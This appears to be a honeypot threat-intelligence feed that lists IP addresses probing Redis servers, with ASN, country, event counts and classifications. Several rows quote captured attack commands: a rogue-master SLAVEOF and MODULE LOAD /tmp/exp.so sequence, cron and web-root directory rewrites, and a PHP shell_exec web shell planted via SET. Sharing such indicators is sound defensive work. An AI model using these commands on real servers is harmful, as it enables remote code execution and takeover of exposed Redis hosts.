| IPv4 | 112.124.33.87 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=CONFIG SET dbfilename exp.so,config set dbfilename root,MODULE LOAD /tmp/exp.so,config set rdbcompression no,config set dir .; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-17 | |
| IPv4 | 115.64.43.227 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=AU; asn=7545; asn_org=TPG Telecom Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-17 | |
| IPv4 | 47.94.133.162 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=CONFIG SET dbfilename exp.so,SLAVEOF 47.95.124.226 60136,MODULE LOAD /tmp/exp.so,config set dbfilename root,config set rdbcompression no; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-17 | |
| IPv4 | 66.132.172.141 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 147.185.132.24 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 20.12.240.9 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 220.154.133.141 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=134756; asn_org=CHINANET Nanjing Jishan IDC network; redis_cmd_hits=0 | scanning_host | 2026-04-17 | |
| IPv4 | 66.132.172.221 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 66.132.186.213 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-17 | |
| IPv4 | 124.156.169.223 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=HK; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmds=MODULE LOAD /tmp/exp.so,config set rdbcompression yes,MODULE UNLOAD system,config set dir .,config set dbfilename root; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-17 | |
| IPv4 | 192.241.144.48 | Attacker IP • Redis / seen in Redishoneypot; events=7; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Misc activity,Not Suspicious Traffic; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 42.112.101.116 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=VN; asn=18403; asn_org=FPT Telecom Company; redis_cmd_hits=0 | scanning_host | 2026-04-17 | |
| IPv4 | 165.232.94.204 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-17 | |
| IPv4 | 52.185.212.58 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 172.178.83.199 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 34.197.70.90 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 193.3.53.3 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=211607; asn_org=Securitytrails, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 205.210.31.66 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 128.14.236.128 | Attacker IP • Redis / seen in Redishoneypot; events=56; ports=6379; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 42.121.253.235 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 170.187.165.242 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 172.232.27.232 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 74.82.47.32 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 74.82.47.4 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 103.230.144.104 | Attacker IP • Redis / seen in Redishoneypot; events=53; ports=6379; cc=TW; asn=55720; asn_org=Gigabit Hosting Sdn Bhd; cats=Generic Protocol Command Decode; redis_cmds=SET rce_cron * * * * * echo '<?php if(isset($_GET["c"])){echo shell_exec($_GET["c"]);} ?>' > /var/www/html/.session-gc-ebnr6t.php ,CONFIG SET dir /var/spool/cron/crontabs,CONFIG SET dir /var/www/html/public/,CONFIG SET dir /var/www/html/,CONFIG SET dir /home/www/; redis_cmd_hits=0; cmd="CONFIG SET dir /etc/cron.d" | malware_hosting | 2026-04-18 | |
| IPv4 | 66.132.195.80 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 40.119.40.152 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-18 | |
| IPv4 | 115.191.4.11 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-18 | |
| IPv4 | 124.71.110.43 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=55990; asn_org=Huawei Cloud Service data center; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 20.169.107.169 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 164.90.184.167 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 20.253.66.6 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 61.107.201.84 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=KR; asn=139648; asn_org=PacketStream Korea; redis_cmd_hits=0 | scanning_host | 2026-04-19 | |
| IPv4 | 147.185.132.40 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 18.116.101.220 | Attacker IP • Redis / seen in Redishoneypot; events=96; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-04-19 | |
| IPv4 | 193.163.125.17 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-19 | |
| IPv4 | 14.103.220.97 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-04-19 | |
| IPv4 | 65.49.20.107 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-19 | |
| IPv4 | 65.49.20.67 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 77.83.240.70 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | scanning_host | 2026-04-19 | |
| IPv4 | 47.95.247.169 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-19 | |
| IPv4 | 118.210.60.33 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=AU; asn=7545; asn_org=TPG Telecom Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 20.106.48.199 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 211.57.129.104 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=KR; asn=4766; asn_org=Korea Telecom; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 147.185.132.78 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 45.142.193.7 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=RO; asn=214295; asn_org=Skynet Network Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 119.45.38.38 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 160.119.76.43 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 172.237.150.22 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 64.62.156.192 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 64.62.156.193 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 143.244.165.110 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 66.132.172.187 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 46.101.166.141 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 20.127.220.21 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-20 | |
| IPv4 | 178.154.236.35 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=200350; asn_org=Yandex.Cloud LLC; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 212.227.57.38 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0 | scanning_host | 2026-04-20 | |
| IPv4 | 142.93.4.248 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 20.65.219.49 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 69.6.227.130 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CL; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | scanning_host | 2026-04-21 | |
| IPv4 | 143.42.164.204 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-21 | |
| IPv4 | 184.105.139.67 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 184.105.139.95 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-21 | |
| IPv4 | 66.132.172.103 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 20.65.192.33 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 20.175.203.24 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 212.8.252.6 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=49981; asn_org=WorldStream B.V.; redis_cmd_hits=0 | scanning_host | 2026-04-21 | |
| IPv4 | 20.87.198.19 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 147.185.132.252 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-21 | |
| IPv4 | 157.230.92.14 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-21 | |
| IPv4 | 121.37.141.75 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=55990; asn_org=Huawei Cloud Service data center; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 36.135.17.52 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=134810; asn_org=China Mobile Group JiLin communications corporation; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 4.174.178.51 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 47.95.118.105 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=config set rdbcompression no,config set dbfilename dump.rdb,SLAVEOF NO ONE,config set rdbcompression yes,MODULE LOAD /tmp/exp.so; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-22 | |
| IPv4 | 66.240.223.208 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 118.196.87.226 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 193.163.125.28 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 4.236.37.204 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 135.237.126.169 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 8.142.178.141 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 161.35.116.145 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 161.35.117.174 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 23.239.4.211 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 45.33.95.64 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 172.202.113.68 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 20.64.105.127 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-22 | |
| IPv4 | 46.110.173.90 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=30600; asn_org=Metronet; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 146.70.199.232 | Attacker IP • Redis / seen in Redishoneypot; events=53; ports=6379; cc=SG; asn=9009; asn_org=M247 Europe SRL; cats=Generic Protocol Command Decode; redis_cmds=CONFIG SET dir /var/www/pterodactyl/public/,CONFIG SET dir /etc/cron.d,CONFIG SET dir /srv/www/,CONFIG SET dir /var/www/html/public/,SET rce_payload <?php if(isset($_GET["c"])){echo shell_exec($_GET["c"]);} ?> ; redis_cmd_hits=0; cmd="CONFIG SET dir /etc/cron.d" | malware_hosting | 2026-04-22 | |
| IPv4 | 118.31.1.163 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 8.142.178.14 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-22 | |
| IPv4 | 45.79.109.193 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 120.46.203.161 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=55990; asn_org=Huawei Cloud Service data center; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 62.109.23.206 | Attacker IP • Redis / seen in Redishoneypot; events=40; ports=6379; cc=RU; asn=29182; asn_org=JSC IOT; redis_cmds=MODULE LOAD /tmp/exp.so,MODULE UNLOAD system,save,CONFIG SET dbfilename exp.so,config set dir /var/spool/cron/; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-04-23 | |
| IPv4 | 74.82.47.2 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 74.82.47.22 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 8.219.79.215 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 170.9.225.197 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 195.184.76.157 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 91.230.168.242 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 91.230.168.246 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 91.196.152.157 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 91.196.152.60 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 91.196.152.84 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 160.119.76.60 | Attacker IP • Redis / seen in Redishoneypot; events=35; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 66.132.172.181 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 66.132.224.29 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 66.132.195.155 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-23 | |
| IPv4 | 20.127.185.20 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 198.235.24.80 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-23 | |
| IPv4 | 199.45.155.95 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 68.183.109.132 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 100.28.153.226 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 20.169.104.239 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 160.119.76.40 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 119.45.248.246 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 120.48.2.240 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 184.105.247.244 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 184.105.247.254 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 66.132.172.134 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 66.132.186.250 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 109.104.154.181 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=NL; asn=136258; asn_org=BrainStorm Network, Inc; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 35.233.68.173 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=BE; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 159.223.125.170 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 165.154.182.207 | Attacker IP • Redis / seen in Redishoneypot; events=56; ports=6379; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
| IPv4 | 66.132.172.225 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-04-24 | |
| IPv4 | 66.132.195.89 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-04-24 | |
